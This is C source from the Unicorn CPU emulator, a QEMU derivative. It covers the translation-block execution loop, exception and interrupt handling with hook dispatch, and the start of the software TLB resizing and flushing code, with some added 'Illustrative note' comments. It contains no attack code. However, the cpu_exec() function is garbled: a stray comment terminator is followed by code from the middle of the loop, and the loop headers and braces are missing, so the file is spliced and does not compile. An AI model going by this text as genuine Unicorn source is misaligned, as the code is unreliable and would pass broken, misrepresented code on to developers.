#include "sysemu/cpus.h"

#include "uc_priv.h"

/* -icount align implementation. */

typedef struct SyncClocks {
    int64_t diff_clk;
    int64_t last_cpu_icount;
    int64_t realtime_clock;
} SyncClocks;
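
/*
 * Illustrative note: SyncClocks backs the -icount align machinery inherited
 * from QEMU.  In this port its only users (init_delay_params()/align_clocks()
 * and the local "sc" variable) appear solely in commented-out form in
 * cpu_exec() below, so the struct is effectively vestigial here.
 */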

/* Allow the guest to have a max 3ms advance.
 * The difference between the 2 clocks could therefore
 * oscillate around 0.
 */
#define VM_CLOCK_ADVANCE 3000000
#define THRESHOLD_REDUCE 1.5
#define MAX_DELAY_PRINT_RATE 2000000000LL
#define MAX_NB_PRINTS 100

/* Execute a TB, and fix up the CPU state afterwards if necessary */
static inline tcg_target_ulong cpu_tb_exec(CPUState *cpu, TranslationBlock *itb)
{
    CPUArchState *env = cpu->env_ptr;
    uintptr_t ret;
    TranslationBlock *last_tb;
    int tb_exit;
    uint8_t *tb_ptr = itb->tc.ptr;

    UC_TRACE_START(UC_TRACE_TB_EXEC);
    tb_exec_lock(cpu->uc);
    ret = tcg_qemu_tb_exec(env, tb_ptr);
    if (cpu->uc->nested_level == 1) {
        // Only unlock (allow writing to the JIT area) if we are the
        // outermost uc_emu_start.
        tb_exec_unlock(cpu->uc);
    }
    UC_TRACE_END(UC_TRACE_TB_EXEC, "[uc] exec tb 0x%" PRIx64 ": ", itb->pc);
    cpu->can_do_io = 1;
    last_tb = (TranslationBlock *)(ret & ~TB_EXIT_MASK);
    tb_exit = ret & TB_EXIT_MASK;
    // trace_exec_tb_exit(last_tb, tb_exit);

    if (tb_exit > TB_EXIT_IDX1) {
        /* We didn't start executing this TB (eg because the instruction
         * counter hit zero); we must restore the guest PC to the address
         * of the start of the TB.
         */
        CPUClass *cc = CPU_GET_CLASS(cpu);

        if (!HOOK_EXISTS(env->uc, UC_HOOK_CODE)) {
            // We should sync the PC for R/W errors.
            switch (env->uc->invalid_error) {
            case UC_ERR_WRITE_PROT:
            case UC_ERR_READ_PROT:
            case UC_ERR_FETCH_PROT:
            case UC_ERR_WRITE_UNMAPPED:
            case UC_ERR_READ_UNMAPPED:
            case UC_ERR_FETCH_UNMAPPED:
            case UC_ERR_WRITE_UNALIGNED:
            case UC_ERR_READ_UNALIGNED:
            case UC_ERR_FETCH_UNALIGNED:
                break;
            default:
                // If we received a quit request, the user has already
                // synced the PC themselves.
                if (!cpu->uc->quit_request) {
                    if (cc->synchronize_from_tb) {
                        cc->synchronize_from_tb(cpu, last_tb);
                    } else {
                        assert(cc->set_pc);
                        cc->set_pc(cpu, last_tb->pc);
                    }
                }
            }
        }
        cpu->tcg_exit_req = 0;
    }
    return ret;
}
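
/*
 * Illustrative note: tcg_qemu_tb_exec() returns the address of the last
 * executed TB with the exit reason packed into its low bits, e.g.:
 *
 *     last_tb = (TranslationBlock *)(ret & ~TB_EXIT_MASK);
 *     tb_exit = ret & TB_EXIT_MASK;  // TB_EXIT_IDX0/IDX1: taken jump slot,
 *                                    // TB_EXIT_REQUESTED: asynchronous exit
 *
 * which is exactly the decoding performed in cpu_tb_exec() above.
 */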

/* Execute the code without caching the generated code.  An interpreter
   could be used if available. */
static void cpu_exec_nocache(CPUState *cpu, int max_cycles,
                             TranslationBlock *orig_tb, bool ignore_icount)
{
    TranslationBlock *tb;
    uint32_t cflags = curr_cflags() | CF_NOCACHE;

    if (ignore_icount) {
        cflags &= ~CF_USE_ICOUNT;
    }

    /* Should never happen.
       We only end up here when an existing TB is too long.  */
    cflags |= MIN(max_cycles, CF_COUNT_MASK);

    mmap_lock();
    tb = tb_gen_code(cpu, orig_tb->pc, orig_tb->cs_base,
                     orig_tb->flags, cflags);
    tb->orig_tb = orig_tb;
    mmap_unlock();

    /* execute the generated code */
    cpu_tb_exec(cpu, tb);

    mmap_lock();
    tb_phys_invalidate(cpu->uc->tcg_ctx, tb, -1);
    mmap_unlock();
    tcg_tb_remove(cpu->uc->tcg_ctx, tb);
}

struct tb_desc {
    target_ulong pc;
    target_ulong cs_base;
    CPUArchState *env;
    tb_page_addr_t phys_page1;
    uint32_t flags;
    uint32_t cf_mask;
    uint32_t trace_vcpu_dstate;
};

static bool tb_lookup_cmp(struct uc_struct *uc, const void *p, const void *d)
{
    const TranslationBlock *tb = p;
    const struct tb_desc *desc = d;

    if (tb->pc == desc->pc &&
        tb->page_addr[0] == desc->phys_page1 &&
        tb->cs_base == desc->cs_base &&
        tb->flags == desc->flags &&
        tb->trace_vcpu_dstate == desc->trace_vcpu_dstate &&
        (tb_cflags(tb) & (CF_HASH_MASK | CF_INVALID)) == desc->cf_mask) {
        /* check next page if needed */
        if (tb->page_addr[1] == -1) {
            return true;
        } else {
            tb_page_addr_t phys_page2;
            target_ulong virt_page2;

            virt_page2 = (desc->pc & TARGET_PAGE_MASK) + TARGET_PAGE_SIZE;
            phys_page2 = get_page_addr_code(desc->env, virt_page2);
            if (tb->page_addr[1] == phys_page2) {
                return true;
            }
        }
    }
    return false;
}

TranslationBlock *tb_htable_lookup(CPUState *cpu, target_ulong pc,
                                   target_ulong cs_base, uint32_t flags,
                                   uint32_t cf_mask)
{
    struct uc_struct *uc = cpu->uc;
    tb_page_addr_t phys_pc;
    struct tb_desc desc;
    uint32_t h;

    desc.env = (CPUArchState *)cpu->env_ptr;
    desc.cs_base = cs_base;
    desc.flags = flags;
    desc.cf_mask = cf_mask;
    desc.trace_vcpu_dstate = *cpu->trace_dstate;
    desc.pc = pc;
    phys_pc = get_page_addr_code(desc.env, pc);
    if (phys_pc == -1) {
        return NULL;
    }
    desc.phys_page1 = phys_pc & TARGET_PAGE_MASK;
    h = tb_hash_func(phys_pc, pc, flags, cf_mask, *cpu->trace_dstate);
    return qht_lookup_custom(uc, &cpu->uc->tcg_ctx->tb_ctx.htable, &desc, h,
                             tb_lookup_cmp);
}

void tb_set_jmp_target(TranslationBlock *tb, int n, uintptr_t addr)
{
    if (TCG_TARGET_HAS_direct_jump) {
        uintptr_t offset = tb->jmp_target_arg[n];
        uintptr_t tc_ptr = (uintptr_t)tb->tc.ptr;
        tb_target_set_jmp_target(tc_ptr, tc_ptr + offset, addr);
    } else {
        tb->jmp_target_arg[n] = addr;
    }
}

static inline void tb_add_jump(TranslationBlock *tb, int n,
                               TranslationBlock *tb_next)
{
    uintptr_t old;

    assert(n < ARRAY_SIZE(tb->jmp_list_next));

    /* make sure the destination TB is valid */
    if (tb_next->cflags & CF_INVALID) {
        goto out_unlock_next;
    }
    /* Atomically claim the jump destination slot only if it was NULL */
#ifdef _MSC_VER
    old = atomic_cmpxchg((long *)&tb->jmp_dest[n], (uintptr_t)NULL,
                         (uintptr_t)tb_next);
#else
    old = atomic_cmpxchg(&tb->jmp_dest[n], (uintptr_t)NULL,
                         (uintptr_t)tb_next);
#endif
    if (old) {
        goto out_unlock_next;
    }

    /* patch the native jump address */
    tb_set_jmp_target(tb, n, (uintptr_t)tb_next->tc.ptr);

    /* add in TB jmp list */
    tb->jmp_list_next[n] = tb_next->jmp_list_head;
    tb_next->jmp_list_head = (uintptr_t)tb | n;
    return;

out_unlock_next:
    return;
}

static inline TranslationBlock *tb_find(CPUState *cpu,
                                        TranslationBlock *last_tb,
                                        int tb_exit, uint32_t cf_mask)
{
    TranslationBlock *tb;
    target_ulong cs_base, pc;
    uint32_t flags;
    uc_tb cur_tb, prev_tb;
    uc_engine *uc = cpu->uc;
    struct list_item *cur;
    struct hook *hook;

    tb = tb_lookup__cpu_state(cpu, &pc, &cs_base, &flags, cf_mask);
    if (tb == NULL) {
        mmap_lock();
        tb = tb_gen_code(cpu, pc, cs_base, flags, cf_mask);
        mmap_unlock();
        /* We add the TB in the virtual pc hash table for the fast lookup */
        cpu->tb_jmp_cache[tb_jmp_cache_hash_func(cpu->uc, pc)] = tb;
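        /*
         * Unicorn: the block below notifies any registered
         * UC_HOOK_EDGE_GENERATED callbacks that a fresh TB was generated,
         * passing copies of the new block and of the previously executed one.
         */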
        if (uc->last_tb) {
            UC_TB_COPY(&cur_tb, tb);
            UC_TB_COPY(&prev_tb, uc->last_tb);
            for (cur = uc->hook[UC_HOOK_EDGE_GENERATED_IDX].head;
                 cur != NULL && (hook = (struct hook *)cur->data);
                 cur = cur->next) {
                if (hook->to_delete) {
                    continue;
                }
                if (HOOK_BOUND_CHECK(hook, (uint64_t)tb->pc)) {
                    JIT_CALLBACK_GUARD(((uc_hook_edge_gen_t)hook->callback)(
                        uc, &cur_tb, &prev_tb, hook->user_data));
                }
            }
        }
    }

    /* We don't take care of direct jumps when address mapping changes in
     * system emulation. So it's not safe to make a direct jump to a TB
     * spanning two pages because the mapping for the second page can change.
     */
    if (tb->page_addr[1] != -1) {
        last_tb = NULL;
    }

    /* See if we can patch the calling TB. */
    if (last_tb) {
        tb_add_jump(last_tb, tb_exit, tb);
    }
    return tb;
}

static inline bool cpu_handle_halt(CPUState *cpu)
{
    if (cpu->halted) {
#if 0
#if defined(TARGET_I386)
        if ((cpu->interrupt_request & CPU_INTERRUPT_POLL)
            && replay_interrupt()) {
            X86CPU *x86_cpu = X86_CPU(cpu);
            apic_poll_irq(x86_cpu->apic_state);
            cpu_reset_interrupt(cpu, CPU_INTERRUPT_POLL);
        }
#endif
#endif
        if (!cpu_has_work(cpu)) {
            return true;
        }

        cpu->halted = 0;
    }

    return false;
}

static inline void cpu_handle_debug_exception(CPUState *cpu)
{
    CPUClass *cc = CPU_GET_CLASS(cpu);
    CPUWatchpoint *wp;

    if (!cpu->watchpoint_hit) {
        QTAILQ_FOREACH(wp, &cpu->watchpoints, entry) {
            wp->flags &= ~BP_WATCHPOINT_HIT;
        }
    }

    cc->debug_excp_handler(cpu);
}

static inline bool cpu_handle_exception(CPUState *cpu, int *ret)
{
    bool catched = false;
    struct uc_struct *uc = cpu->uc;
    struct hook *hook;

    // printf(">> exception index = %u\n", cpu->exception_index); qq
    if (cpu->uc->stop_interrupt &&
        cpu->uc->stop_interrupt(cpu->uc, cpu->exception_index)) {
        // Unicorn: call registered invalid instruction callbacks
        catched = false;
        HOOK_FOREACH_VAR_DECLARE;
        HOOK_FOREACH(uc, hook, UC_HOOK_INSN_INVALID) {
            if (hook->to_delete) {
                continue;
            }
            JIT_CALLBACK_GUARD_VAR(catched,
                ((uc_cb_hookinsn_invalid_t)hook->callback)(uc, hook->user_data));
            if (catched) {
                break;
            }
        }
        if (!catched) {
            uc->invalid_error = UC_ERR_INSN_INVALID;
            // we want to stop emulation
            *ret = EXCP_HLT;
            return true;
        }
    }

    if (cpu->exception_index < 0) {
        return false;
    }

    if (cpu->exception_index >= EXCP_INTERRUPT) {
        /* exit request from the cpu execution loop */
        *ret = cpu->exception_index;
        if (*ret == EXCP_DEBUG) {
            cpu_handle_debug_exception(cpu);
        }
        cpu->exception_index = -1;
        return true;
    } else {
#if defined(TARGET_X86_64)
        CPUArchState *env = cpu->env_ptr;
        if (env->exception_is_int) {
            // point EIP to the next instruction after INT
            env->eip = env->exception_next_eip;
        }
#endif
#if defined(TARGET_MIPS) || defined(TARGET_MIPS64)
        // Unicorn: Imported from https://github.com/unicorn-engine/unicorn/pull/1098
        CPUMIPSState *env = &(MIPS_CPU(cpu)->env);
        env->active_tc.PC = uc->next_pc;
#endif
#if defined(TARGET_RISCV)
        CPURISCVState *env = &(RISCV_CPU(uc->cpu)->env);
        env->pc += 4;
#endif
#if defined(TARGET_PPC)
        CPUPPCState *env = &(POWERPC_CPU(uc->cpu)->env);
        env->nip += 4;
#endif
        // Unicorn: call registered interrupt callbacks
        catched = false;
        HOOK_FOREACH_VAR_DECLARE;
        HOOK_FOREACH(uc, hook, UC_HOOK_INTR) {
            if (hook->to_delete) {
                continue;
            }
            JIT_CALLBACK_GUARD(((uc_cb_hookintr_t)hook->callback)(
                uc, cpu->exception_index, hook->user_data));
            catched = true;
        }
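        /*
         * Illustrative usage from the API side (not part of this file):
         *
         *     static void on_intr(uc_engine *uc, uint32_t intno, void *data)
         *     {
         *         // e.g. service a guest syscall or software interrupt here
         *     }
         *     uc_hook h;
         *     uc_hook_add(uc, &h, UC_HOOK_INTR, on_intr, NULL, 1, 0);
         *
         * Each such callback is what the loop above dispatches to.
         */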
        // Unicorn: if the interrupt was not caught by any hook, stop execution.
        if (!catched) {
            // printf("AAAAAAAAAAAA\n"); qq
            uc->invalid_error = UC_ERR_EXCEPTION;
            cpu->halted = 1;
            *ret = EXCP_HLT;
            return true;
        }
        cpu->exception_index = -1;
    }

    *ret = EXCP_INTERRUPT;
    return false;
}

static inline bool cpu_handle_interrupt(CPUState *cpu,
                                        TranslationBlock **last_tb)
{
    CPUClass *cc = CPU_GET_CLASS(cpu);

    /* Clear the interrupt flag now since we're processing
     * cpu->interrupt_request and cpu->exit_request.
     * Ensure zeroing happens before reading cpu->exit_request or
     * cpu->interrupt_request (see also smp_wmb in cpu_exit())
     */
    cpu_neg(cpu)->icount_decr.u16.high = 0;

    if (unlikely(cpu->interrupt_request)) {
        int interrupt_request;
        interrupt_request = cpu->interrupt_request;
        if (unlikely(cpu->singlestep_enabled & SSTEP_NOIRQ)) {
            /* Mask out external interrupts for this step. */
            interrupt_request &= ~CPU_INTERRUPT_SSTEP_MASK;
        }
        if (interrupt_request & CPU_INTERRUPT_DEBUG) {
            cpu->interrupt_request &= ~CPU_INTERRUPT_DEBUG;
            cpu->exception_index = EXCP_DEBUG;
            return true;
        }
#if defined(TARGET_I386)
        else if (interrupt_request & CPU_INTERRUPT_INIT) {
            X86CPU *x86_cpu = X86_CPU(cpu);
            CPUArchState *env = &x86_cpu->env;
            //replay_interrupt();
            cpu_svm_check_intercept_param(env, SVM_EXIT_INIT, 0, 0);
            do_cpu_init(x86_cpu);
            cpu->exception_index = EXCP_HALTED;
            return true;
        }
#else
        else if (interrupt_request & CPU_INTERRUPT_RESET) {
            //replay_interrupt();
            cpu_reset(cpu);
            return true;
        }
#endif
        /* The target hook has 3 exit conditions:
           False when the interrupt isn't processed,
           True when it is, and we should restart on a new TB,
           and via longjmp via cpu_loop_exit.  */
        else {
            if (cc->cpu_exec_interrupt(cpu, interrupt_request)) {
                //replay_interrupt();
                cpu->exception_index = -1;
                *last_tb = NULL;
            }
            /* The target hook may have updated the 'cpu->interrupt_request';
             * reload the 'interrupt_request' value */
            interrupt_request = cpu->interrupt_request;
        }
        if (interrupt_request & CPU_INTERRUPT_EXITTB) {
            cpu->interrupt_request &= ~CPU_INTERRUPT_EXITTB;
            /* ensure that no TB jump will be modified as
               the program flow was changed */
            *last_tb = NULL;
        }
    }

    /* Finally, check if we need to exit to the main loop. */
    if (unlikely(cpu->exit_request)) {
        cpu->exit_request = 0;
        if (cpu->exception_index == -1) {
            cpu->exception_index = EXCP_INTERRUPT;
        }
        return true;
    }

    return false;
}

static inline void cpu_loop_exec_tb(CPUState *cpu, TranslationBlock *tb,
                                    TranslationBlock **last_tb, int *tb_exit)
{
    uintptr_t ret;
    int32_t insns_left;

    // trace_exec_tb(tb, tb->pc);
    ret = cpu_tb_exec(cpu, tb);
    cpu->uc->last_tb = tb; // Trace the last tb we executed.
    tb = (TranslationBlock *)(ret & ~TB_EXIT_MASK);
    *tb_exit = ret & TB_EXIT_MASK;
    if (*tb_exit != TB_EXIT_REQUESTED) {
        *last_tb = tb;
        return;
    }

    *last_tb = NULL;
    insns_left = cpu_neg(cpu)->icount_decr.u32;
    if (insns_left < 0) {
        /* Something asked us to stop executing chained TBs; just
         * continue round the main loop. Whatever requested the exit
         * will also have set something else (eg exit_request or
         * interrupt_request) which will be handled by
         * cpu_handle_interrupt.  cpu_handle_interrupt will also
         * clear cpu->icount_decr.u16.high.
         */
        return;
    }

    /* Instruction counter expired.  */
    /* Refill decrementer and continue execution.  */
    insns_left = MIN(0xffff, cpu->icount_budget);
    cpu_neg(cpu)->icount_decr.u16.low = insns_left;
    cpu->icount_extra = cpu->icount_budget - insns_left;
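    /*
     * Illustrative arithmetic: with icount_budget == 0x12345, the 16-bit
     * decrementer low half receives MIN(0xffff, 0x12345) == 0xffff
     * instructions, and icount_extra keeps the remaining 0x2346 for
     * subsequent refills.
     */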
    if (!cpu->icount_extra) {
        /* Execute any remaining instructions, then let the main loop
         * handle the next event.
         */
        if (insns_left > 0) {
            cpu_exec_nocache(cpu, insns_left, tb, false);
        }
    }
}

/* main execution loop */

int cpu_exec(struct uc_struct *uc, CPUState *cpu)
{
    CPUClass *cc = CPU_GET_CLASS(cpu);
    int ret;
    // SyncClocks sc = { 0 };

    if (cpu_handle_halt(cpu)) {
        return EXCP_HALTED;
    }

    // rcu_read_lock();
    cc->cpu_exec_enter(cpu);

    /* Calculate difference between guest clock and host clock.
     * This delay includes the delay of the last cycle, so
     * what we have to do is sleep until it is 0. As for the
     * advance/delay we gain here, we try to fix it next time.
     */
    // init_delay_params(&sc, cpu);

    // Unicorn: We would like to support nested uc_emu_start calls.
    /* prepare setjmp context for exception handling */
    // if (sigsetjmp(cpu->jmp_env, 0) != 0) {
    if (sigsetjmp(uc->jmp_bufs[uc->nested_level - 1], 0) != 0) {
#if defined(__clang__) || !QEMU_GNUC_PREREQ(4, 6)
        /* Some compilers wrongly smash all local variables after
         * siglongjmp. There were bug reports for gcc 4.5.0 and clang.
         * Reload essential local variables here for those compilers.
         * Newer versions of gcc would complain about this code (-Wclobbered). */
        cc = CPU_GET_CLASS(cpu);
#else /* buggy compiler */
        /* Assert that the compiler does not smash local variables. */
        // g_assert(cpu == current_cpu);
        g_assert(cc == CPU_GET_CLASS(cpu));
#endif /* buggy compiler */
        assert_no_pages_locked();
    }
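
    /*
     * Illustrative note: together with the siglongjmp() in cpu_loop_exit(),
     * the sigsetjmp() above gives every nesting depth of uc_emu_start() its
     * own recovery point. jmp_bufs[nested_level - 1] is the buffer of the
     * innermost emulation, so an exception raised from generated code lands
     * back in the cpu_exec() invocation that launched it.
     */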
             */
            if (cflags == -1) {
                cflags = curr_cflags();
            } else {
                cpu->cflags_next_tb = -1;
            }

            tb = tb_find(cpu, last_tb, tb_exit, cflags);
            if (unlikely(cpu->exit_request)) {
                continue;
            }
            cpu_loop_exec_tb(cpu, tb, &last_tb, &tb_exit);
            /* Try to align the host and virtual clocks
               if the guest is in advance */
            // align_clocks(&sc, cpu);
        }
    }

    // Unicorn: Clear any TCG exit flag that might have been left set by exit requests
    uc->cpu->tcg_exit_req = 0;

    cc->cpu_exec_exit(cpu);
    // rcu_read_unlock();

    return ret;
}
unicorn-2.1.1/qemu/accel/tcg/cputlb.c
/*
 * Common CPU TLB handling
 *
 * Copyright (c) 2003 Fabrice Bellard
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2.1 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see <http://www.gnu.org/licenses/>.
 */

#include "qemu/osdep.h"
#include "cpu.h"
#include "exec/exec-all.h"
#include "exec/memory.h"
#include "exec/cpu_ldst.h"
#include "exec/cputlb.h"
#include "exec/memory-internal.h"
#include "exec/ram_addr.h"
#include "tcg/tcg.h"
#include "exec/helper-proto.h"
#include "qemu/atomic.h"
#include "qemu/atomic128.h"
#include "translate-all.h"
#include "exec/cpu-common.h"
#include "trace/mem.h"

#include <uc_priv.h>
#include <glib_compat.h>

/* DEBUG defines, enable DEBUG_TLB_LOG to log to the CPU_LOG_MMU target */
/* #define DEBUG_TLB */
/* #define DEBUG_TLB_LOG */

#ifdef DEBUG_TLB
# define DEBUG_TLB_GATE 1
# ifdef DEBUG_TLB_LOG
#  define DEBUG_TLB_LOG_GATE 1
# else
#  define DEBUG_TLB_LOG_GATE 0
# endif
#else
# define DEBUG_TLB_GATE 0
# define DEBUG_TLB_LOG_GATE 0
#endif

#if 0
#define assert_cpu_is_self(cpu) do {                              \
        if (DEBUG_TLB_GATE) {                                     \
            g_assert(!(cpu)->created || qemu_cpu_is_self(cpu));   \
        }                                                         \
    } while (0)
#endif

/* run_on_cpu_data.target_ptr should always be big enough for a
 * target_ulong even on 32 bit builds */
QEMU_BUILD_BUG_ON(sizeof(target_ulong) > sizeof(run_on_cpu_data));

/* We currently can't handle more than 16 bits in the MMUIDX bitmask.
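 * For example, with NB_MMU_MODES == 3 the ALL_MMUIDX_BITS value below
 * evaluates to (1 << 3) - 1 == 0b111: one flush bit per MMU mode.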
*/ QEMU_BUILD_BUG_ON(NB_MMU_MODES > 16); #define ALL_MMUIDX_BITS ((1 << NB_MMU_MODES) - 1) static inline size_t tlb_n_entries(CPUTLBDescFast *fast) { return (fast->mask >> CPU_TLB_ENTRY_BITS) + 1; } static inline size_t sizeof_tlb(CPUTLBDescFast *fast) { return fast->mask + (1 << CPU_TLB_ENTRY_BITS); } static void tlb_window_reset(CPUTLBDesc *desc, int64_t ns, size_t max_entries) { desc->window_begin_ns = ns; desc->window_max_entries = max_entries; } /** * tlb_mmu_resize_locked() - perform TLB resize bookkeeping; resize if necessary * @desc: The CPUTLBDesc portion of the TLB * @fast: The CPUTLBDescFast portion of the same TLB * * Called with tlb_lock_held. * * We have two main constraints when resizing a TLB: (1) we only resize it * on a TLB flush (otherwise we'd have to take a perf hit by either rehashing * the array or unnecessarily flushing it), which means we do not control how * frequently the resizing can occur; (2) we don't have access to the guest's * future scheduling decisions, and therefore have to decide the magnitude of * the resize based on past observations. * * In general, a memory-hungry process can benefit greatly from an appropriately * sized TLB, since a guest TLB miss is very expensive. This doesn't mean that * we just have to make the TLB as large as possible; while an oversized TLB * results in minimal TLB miss rates, it also takes longer to be flushed * (flushes can be _very_ frequent), and the reduced locality can also hurt * performance. * * To achieve near-optimal performance for all kinds of workloads, we: * * 1. Aggressively increase the size of the TLB when the use rate of the * TLB being flushed is high, since it is likely that in the near future this * memory-hungry process will execute again, and its memory hungriness will * probably be similar. * * 2. Slowly reduce the size of the TLB as the use rate declines over a * reasonably large time window. The rationale is that if in such a time window * we have not observed a high TLB use rate, it is likely that we won't observe * it in the near future. In that case, once a time window expires we downsize * the TLB to match the maximum use rate observed in the window. * * 3. Try to keep the maximum use rate in a time window in the 30-70% range, * since in that range performance is likely near-optimal. Recall that the TLB * is direct mapped, so we want the use rate to be low (or at least not too * high), since otherwise we are likely to have a significant amount of * conflict misses. */ static void tlb_mmu_resize_locked(struct uc_struct *uc, CPUTLBDesc *desc, CPUTLBDescFast *fast, int64_t now) { size_t old_size = tlb_n_entries(fast); size_t rate; size_t new_size = old_size; int64_t window_len_ms = 100; int64_t window_len_ns = window_len_ms * 1000 * 1000; bool window_expired = now > desc->window_begin_ns + window_len_ns; if (desc->n_used_entries > desc->window_max_entries) { desc->window_max_entries = desc->n_used_entries; } rate = desc->window_max_entries * 100 / old_size; if (rate > 70) { new_size = MIN(old_size << 1, 1ULL << CPU_TLB_DYN_MAX_BITS); } else if (rate < 30 && window_expired) { size_t ceil = pow2ceil(desc->window_max_entries); size_t expected_rate = desc->window_max_entries * 100 / ceil; /* * Avoid undersizing when the max number of entries seen is just below * a pow2. For instance, if max_entries == 1025, the expected use rate * would be 1025/2048==50%. However, if max_entries == 1023, we'd get * 1023/1024==99.9% use rate, so we'd likely end up doubling the size * later. 
Thus, make sure that the expected use rate remains below 70%. * (and since we double the size, that means the lowest rate we'd * expect to get is 35%, which is still in the 30-70% range where * we consider that the size is appropriate.) */ if (expected_rate > 70) { ceil *= 2; } new_size = MAX(ceil, 1 << CPU_TLB_DYN_MIN_BITS); } if (new_size == old_size) { if (window_expired) { tlb_window_reset(desc, now, desc->n_used_entries); } return; } g_free(fast->table); g_free(desc->iotlb); tlb_window_reset(desc, now, 0); /* desc->n_used_entries is cleared by the caller */ fast->mask = (new_size - 1) << CPU_TLB_ENTRY_BITS; fast->table = g_try_new(CPUTLBEntry, new_size); desc->iotlb = g_try_new(CPUIOTLBEntry, new_size); if (desc->iotlb) { memset(desc->iotlb, 0, sizeof(CPUIOTLBEntry) * new_size); } /* * If the allocations fail, try smaller sizes. We just freed some * memory, so going back to half of new_size has a good chance of working. * Increased memory pressure elsewhere in the system might cause the * allocations to fail though, so we progressively reduce the allocation * size, aborting if we cannot even allocate the smallest TLB we support. */ while (fast->table == NULL || desc->iotlb == NULL) { if (new_size == (1 << CPU_TLB_DYN_MIN_BITS)) { fprintf(stderr, "%s: %s.\n", __func__, strerror(errno)); abort(); // FIXME: do not abort } new_size = MAX(new_size >> 1, 1 << CPU_TLB_DYN_MIN_BITS); fast->mask = (new_size - 1) << CPU_TLB_ENTRY_BITS; g_free(fast->table); g_free(desc->iotlb); fast->table = g_try_new(CPUTLBEntry, new_size); desc->iotlb = g_try_new(CPUIOTLBEntry, new_size); } } static void tlb_mmu_flush_locked(CPUTLBDesc *desc, CPUTLBDescFast *fast) { desc->n_used_entries = 0; desc->large_page_addr = -1; desc->large_page_mask = -1; desc->vindex = 0; memset(fast->table, -1, sizeof_tlb(fast)); memset(desc->vtable, -1, sizeof(desc->vtable)); } static void tlb_flush_one_mmuidx_locked(CPUArchState *env, int mmu_idx, int64_t now) { CPUTLBDesc *desc = &env_tlb(env)->d[mmu_idx]; CPUTLBDescFast *fast = &env_tlb(env)->f[mmu_idx]; tlb_mmu_resize_locked(env->uc, desc, fast, now); tlb_mmu_flush_locked(desc, fast); } static void tlb_mmu_init(CPUTLBDesc *desc, CPUTLBDescFast *fast, int64_t now) { size_t n_entries = 1 << CPU_TLB_DYN_DEFAULT_BITS; tlb_window_reset(desc, now, 0); desc->n_used_entries = 0; fast->mask = (n_entries - 1) << CPU_TLB_ENTRY_BITS; fast->table = g_new(CPUTLBEntry, n_entries); desc->iotlb = g_new(CPUIOTLBEntry, n_entries); tlb_mmu_flush_locked(desc, fast); } static inline void tlb_n_used_entries_inc(CPUArchState *env, uintptr_t mmu_idx) { env_tlb(env)->d[mmu_idx].n_used_entries++; } static inline void tlb_n_used_entries_dec(CPUArchState *env, uintptr_t mmu_idx) { env_tlb(env)->d[mmu_idx].n_used_entries--; } void tlb_init(CPUState *cpu) { CPUArchState *env = cpu->env_ptr; int64_t now = get_clock_realtime(); int i; /* All tlbs are initialized flushed. */ env_tlb(env)->c.dirty = 0; for (i = 0; i < NB_MMU_MODES; i++) { tlb_mmu_init(&env_tlb(env)->d[i], &env_tlb(env)->f[i], now); } } /* flush_all_helper: run fn across all cpus * * If the wait flag is set then the src cpu's helper will be queued as * "safe" work and the loop exited creating a synchronisation point * where all queued work will be finished before execution starts * again. 
*/ static void flush_all_helper(CPUState *src, run_on_cpu_func fn, run_on_cpu_data d) { #if 0 CPUState *cpu; CPU_FOREACH(cpu) { if (cpu != src) { // async_run_on_cpu(cpu, fn, d); fn(cpu, d); } } #endif } static void tlb_flush_by_mmuidx_async_work(CPUState *cpu, run_on_cpu_data data) { CPUArchState *env = cpu->env_ptr; uint16_t asked = data.host_int; uint16_t all_dirty, work, to_clean; int64_t now = get_clock_realtime(); all_dirty = env_tlb(env)->c.dirty; to_clean = asked & all_dirty; all_dirty &= ~to_clean; env_tlb(env)->c.dirty = all_dirty; for (work = to_clean; work != 0; work &= work - 1) { int mmu_idx = ctz32(work); tlb_flush_one_mmuidx_locked(env, mmu_idx, now); } cpu_tb_jmp_cache_clear(cpu); if (to_clean == ALL_MMUIDX_BITS) { env_tlb(env)->c.full_flush_count = env_tlb(env)->c.full_flush_count + 1; } else { env_tlb(env)->c.part_flush_count = env_tlb(env)->c.part_flush_count + ctpop16(to_clean); if (to_clean != asked) { env_tlb(env)->c.elide_flush_count = env_tlb(env)->c.elide_flush_count + ctpop16(asked & ~to_clean); } } } void tlb_flush_by_mmuidx(CPUState *cpu, uint16_t idxmap) { //if (cpu->created && !qemu_cpu_is_self(cpu)) { // tlb_flush_by_mmuidx_async_work(cpu, RUN_ON_CPU_HOST_INT(idxmap)); //} else { tlb_flush_by_mmuidx_async_work(cpu, RUN_ON_CPU_HOST_INT(idxmap)); //} } void tlb_flush(CPUState *cpu) { tlb_flush_by_mmuidx(cpu, ALL_MMUIDX_BITS); } void tlb_flush_by_mmuidx_all_cpus(CPUState *src_cpu, uint16_t idxmap) { const run_on_cpu_func fn = tlb_flush_by_mmuidx_async_work; flush_all_helper(src_cpu, fn, RUN_ON_CPU_HOST_INT(idxmap)); fn(src_cpu, RUN_ON_CPU_HOST_INT(idxmap)); } void tlb_flush_all_cpus(CPUState *src_cpu) { tlb_flush_by_mmuidx_all_cpus(src_cpu, ALL_MMUIDX_BITS); } void tlb_flush_by_mmuidx_all_cpus_synced(CPUState *src_cpu, uint16_t idxmap) { const run_on_cpu_func fn = tlb_flush_by_mmuidx_async_work; flush_all_helper(src_cpu, fn, RUN_ON_CPU_HOST_INT(idxmap)); fn(src_cpu, RUN_ON_CPU_HOST_INT(idxmap)); } void tlb_flush_all_cpus_synced(CPUState *src_cpu) { tlb_flush_by_mmuidx_all_cpus_synced(src_cpu, ALL_MMUIDX_BITS); } static inline bool tlb_hit_page_anyprot(struct uc_struct *uc, CPUTLBEntry *tlb_entry, target_ulong page) { return tlb_hit_page(uc, tlb_entry->addr_read, page) || tlb_hit_page(uc, tlb_addr_write(tlb_entry), page) || tlb_hit_page(uc, tlb_entry->addr_code, page); } /** * tlb_entry_is_empty - return true if the entry is not in use * @te: pointer to CPUTLBEntry */ static inline bool tlb_entry_is_empty(const CPUTLBEntry *te) { return te->addr_read == -1 && te->addr_write == -1 && te->addr_code == -1; } /* Called with tlb_c.lock held */ static inline bool tlb_flush_entry_locked(struct uc_struct *uc, CPUTLBEntry *tlb_entry, target_ulong page) { if (tlb_hit_page_anyprot(uc, 